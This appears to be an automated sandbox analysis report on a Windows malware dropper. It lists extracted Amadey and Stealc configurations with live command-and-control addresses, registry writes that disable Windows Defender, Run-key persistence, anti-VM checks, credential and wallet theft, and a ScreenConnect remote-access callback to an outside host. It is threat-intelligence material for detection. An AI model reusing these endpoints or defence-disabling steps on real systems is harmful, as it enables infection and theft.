Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-12-2024 16:11
Static task
static1
Behavioral task
behavioral1
Sample
c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe
Resource
win10v2004-20241007-en
General
-
Target
c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe
-
Size
2.9MB
-
MD5
98c28cbc0f77f431bd470b389c8d5d84
-
SHA1
5043a0e8eabeab839570cdc732aa63f98964884d
-
SHA256
c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08
-
SHA512
c41e9eba47cc74c44f01582fd74f935969aabb3dab5d8ab34e0e117b2085d66f5b3ea9b4a05b85ee5f3575443d00385a8eed68c32ca68697020d0e00a66afed7
-
SSDEEP
49152:MF8AKHmSCvD935MM/wMovoJ5I9RMWG9EcosY/O/OecfW:ifymSIh35MewMovoJ5I9RMWGe5/qjcfW
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
cryptbot
Extracted
lumma
Signatures
-
Amadey family
-
Cryptbot family
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral2/files/0x0009000000023cf2-314.dat family_vidar_v7 behavioral2/memory/2940-317-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 behavioral2/memory/2940-381-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 -
Lumma family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 7d7d379775.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 7d7d379775.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 7d7d379775.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 7d7d379775.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 7d7d379775.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 7d7d379775.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2344 created 2992 2344 49d316d08a.exe 50 PID 4712 created 2992 4712 cedb729c19.exe 50 -
Vidar family
-
Enumerates VirtualBox registry keys 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF b8f9100a83.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 1e12196e13.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 22 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8ebc32d904.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1e12196e13.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b8f9100a83.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a91d9902ae.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3e0edd2e8e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cedb729c19.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7d7d379775.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7d3ca92efa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 510c47326c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ WL4Y4FXIXEA30MCREVVA8ZXBD9L.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1343a45d10.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 49d316d08a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8213f04b29.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4364 powershell.exe 788 powershell.exe 6600 powershell.exe 6156 powershell.exe 6452 powershell.exe 4932 powershell.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (98a59bd0eed9222b)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=gips620.top&p=8880&s=63cce5c8-c673-4e2f-98ce-7ae714cc43a6&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA2MWuZsROBUiuvnj7vxetIQAAAAACAAAAAAAQZgAAAAEAACAAAACGc0fG%2faNW%2f9ntt9LoGN1ewkKVXDVOu2EM5P7drVrR8AAAAAAOgAAAAAIAACAAAACqBaWK3B2roQvYTz8nicownkdjx8KD6G4btLH0ZuJ0u6AEAACmnBWlR54jFQ5Cc6oPlNmUm6PkSWzCulcK78y4jQcwgo5dfQ4SnAHAtYYp0IzhsgZtQ4CPlQONIPVlRtsU%2flyX7tO3dKhW%2bHnZpBDoaEIkMSC08yLSYSlkUCxogpifSEPJj96wx%2fgvsORkAQx2S2YGEk%2bCmnvqCk0us5igdfJoq%2byUeV5FKIQwYXhGf%2bTkGm8ueIeJh%2bY96PO7381RbhtSA0o2XwdIusMejHxniniMnXlt%2b9oKKPL3Wmnah9CDBqsfHTC7CeLka%2bxGropbLRdDCXWKxpwIoTKsy3MJEXZo2S0%2bw2brl4BCSFU7I2SP6Wkquq8FCImXb%2fIfj9oUcuniW6MtbboQnaHbELW8MSrt%2fa1cRYt%2fwyUYzlRX0X8jBvQU5gmT1dFq9F18hxhp%2fAhzvgnV3AI2ICkZZI3z5ttgSsO16YAGfL4LYZxwl8Kno5jJXzdkgOsUyovZmk844T8fG8q7hxIfYflDJuiFLBTCtj7QRhL4kCLKMcpGyAbUXflHUbKlxmQQ7Tw2RJ8vNdMaUtpcWzqv79RJqM0VUOWSmasFpEYswKQP1PeOtcLu859ZA4EJ9IJL9rsOpSVM0vU8w4XjdwKp3gfRQb38jFDzN8qkcXktI%2fg4Zqh3lnUESBJm518sqWqekCjIYQxdLskxfGPfhbzNVMRhUTkAleqReOCI5ahh0nGoPI5WpPV2UJEtltzB3prxDL5F4AofZ2Gl4DEFusm5PM1WZB5GtIRcQnxWhAAwtZMsQW%2bo%2fP4XPspzuC%2b8LV7Wah5YlwRFpOd%2bZWpnDj9PxNbRjpYvdv1pc74oVJjKCQziUVy3S3rOC2nGj%2fbq1wNNScoA%2fxuIwfx%2bO1ABVOMT4FxsaoYoD11hSbt4tzv3TpfL%2fkF2vr4F9uwQBKuK%2fr9LuxZBhlDkkhEBnToY6EFDt5V67J8oByodmGRfzrfPyBZjIyJ%2f2RRSGOmBT4%2fjTWS3557RheO1E1%2fhqEP3dqnUmYvK3U16%2btc8lDgDNRQvqKd8icxkwHzvQsovbyEQxVvaV6pUklvykI8L2Ss6cajC2TPVXADVHyVNNvqjsZr1Cr7f5HkiyCsLXiOPaiugNOo%2f%2fdB25G7eH8i7CrjFCIvuYPm1sf8Af3LXccAno7hmXZaoEu0pm5m6YTYDRXXkv1yPJD8BdSqIRz4ZZnxqxRKIdIjHalhq6a3wV8wHRUepY4%2bwp5qKQtPrJhDtuGXgrzgjq1R0VGsgchDA1%2fDCShtqAketNbm9hl4Y2NPCOKNI7eb%2b7kQqFSu%2bOHW2mwkHQQhuwJAFeuDM3fLShIrnvxJjm8aYiC2QDEKiGqcSuJvIm0%2bzr9GqLZRecthChzd27gZ%2bqyMMLhjM2yhc7O8hgSvdf%2buv3Eza0YE0yXlOHRnGOjnDCsSstbjPlop43AQNPI%2bNvh%2fuyagSaSGAzeRIlvICEQ6pjc2Colz8w7QhPoR1%2bbnDb64HBcmJE%2bgC%2fECsvLHQ%2fM0kvRcRrjYwf%2fLCKi7EsdSBDEUYAM77NXrpnGLqN3ThMfHExCYE5UOPmgT%2f3VMBuHpW1Dm3WXGTItzti%2f423o65glX1QmqfekAAAABNkbd5VEBtgphp2UD7E3Yjt9zhrTj2BU7u5jfEmRsg2zxEVsZYDUmwJUZkitBPPAnUHcjhAt0yY1CEOaVbXhAM&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 44 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WL4Y4FXIXEA30MCREVVA8ZXBD9L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 510c47326c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 510c47326c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3e0edd2e8e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8ebc32d904.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8ebc32d904.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7d7d379775.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cedb729c19.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cedb729c19.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8213f04b29.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7d3ca92efa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 49d316d08a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3e0edd2e8e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1343a45d10.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a91d9902ae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WL4Y4FXIXEA30MCREVVA8ZXBD9L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1343a45d10.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7d3ca92efa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1e12196e13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8213f04b29.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b8f9100a83.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b8f9100a83.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7d7d379775.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 49d316d08a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1e12196e13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a91d9902ae.exe -
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation ga70pjP.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation ee82c69916.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 05e82532cd5649f38fb77710959e8897.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 8213f04b29.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation NN9Dd7c.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 031f7bd31e8a4659ac424ac81239be01.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation ed288029eb9e4563bf671b4ce1f8b61f.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 002e33e6e2.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation f208f0109f4f4a50b3ac871d3afa2681.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 772e9249c7.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 52 IoCs
pid Process 2308 axplong.exe 3144 axplong.exe 1724 510c47326c.exe 2344 49d316d08a.exe 2956 8213f04b29.exe 4084 skotes.exe 860 b8f9100a83.exe 5012 NN9Dd7c.exe 2332 ga70pjP.exe 2100 d82d5e19cd.exe 2940 ed288029eb9e4563bf671b4ce1f8b61f.exe 1636 031f7bd31e8a4659ac424ac81239be01.exe 3768 a91d9902ae.exe 5784 ee82c69916.exe 5352 7z.exe 5468 7z.exe 5540 7z.exe 236 7z.exe 5616 7z.exe 5660 7z.exe 4168 7z.exe 2540 7z.exe 4828 in.exe 5576 3e0edd2e8e.exe 5468 8ebc32d904.exe 6296 d82d5e19cd.exe 6560 ScreenConnect.ClientService.exe 6024 249e4c4aa2.exe 6844 ScreenConnect.WindowsClient.exe 6476 ScreenConnect.WindowsClient.exe 6852 7d7d379775.exe 7808 skotes.exe 6660 axplong.exe 6220 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe 7364 WL4Y4FXIXEA30MCREVVA8ZXBD9L.exe 7192 Intel_PTT_EK_Recertification.exe 5440 002e33e6e2.exe 6784 05e82532cd5649f38fb77710959e8897.exe 4480 f208f0109f4f4a50b3ac871d3afa2681.exe 6552 8e6fdcba59.exe 6048 7d3ca92efa.exe 6096 1e12196e13.exe 2024 5f7c680e81.exe 5160 5f7c680e81.exe 6108 1343a45d10.exe 4712 cedb729c19.exe 6792 772e9249c7.exe 6576 8e6fdcba59.exe 216 6255b429668f48439480e235dec40213.exe 7316 skotes.exe 5392 axplong.exe 7272 Intel_PTT_EK_Recertification.exe -
Identifies Wine through registry keys 2 TTPs 22 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 510c47326c.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 49d316d08a.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine a91d9902ae.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 7d3ca92efa.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 1343a45d10.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 8213f04b29.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine b8f9100a83.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine WL4Y4FXIXEA30MCREVVA8ZXBD9L.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 1e12196e13.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 8ebc32d904.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 7d7d379775.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine cedb729c19.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 3e0edd2e8e.exe -
Loads dropped DLL 30 IoCs
pid Process 2432 MsiExec.exe 3612 rundll32.exe 3612 rundll32.exe 3612 rundll32.exe 3612 rundll32.exe 3612 rundll32.exe 3612 rundll32.exe 3612 rundll32.exe 3612 rundll32.exe 3612 rundll32.exe 5352 7z.exe 5468 7z.exe 5540 7z.exe 236 7z.exe 5616 7z.exe 5660 7z.exe 4168 7z.exe 2540 7z.exe 6356 MsiExec.exe 7180 MsiExec.exe 6560 ScreenConnect.ClientService.exe 6560 ScreenConnect.ClientService.exe 6560 ScreenConnect.ClientService.exe 6560 ScreenConnect.ClientService.exe 6560 ScreenConnect.ClientService.exe 6560 ScreenConnect.ClientService.exe 6560 ScreenConnect.ClientService.exe 6560 ScreenConnect.ClientService.exe 6560 ScreenConnect.ClientService.exe 6560 ScreenConnect.ClientService.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 7d7d379775.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 7d7d379775.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8213f04b29.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1007462001\\8213f04b29.exe" axplong.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3e0edd2e8e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017718001\\3e0edd2e8e.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8ebc32d904.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017719001\\8ebc32d904.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\249e4c4aa2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017720001\\249e4c4aa2.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7d7d379775.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017721001\\7d7d379775.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\510c47326c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1007460001\\510c47326c.exe" axplong.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
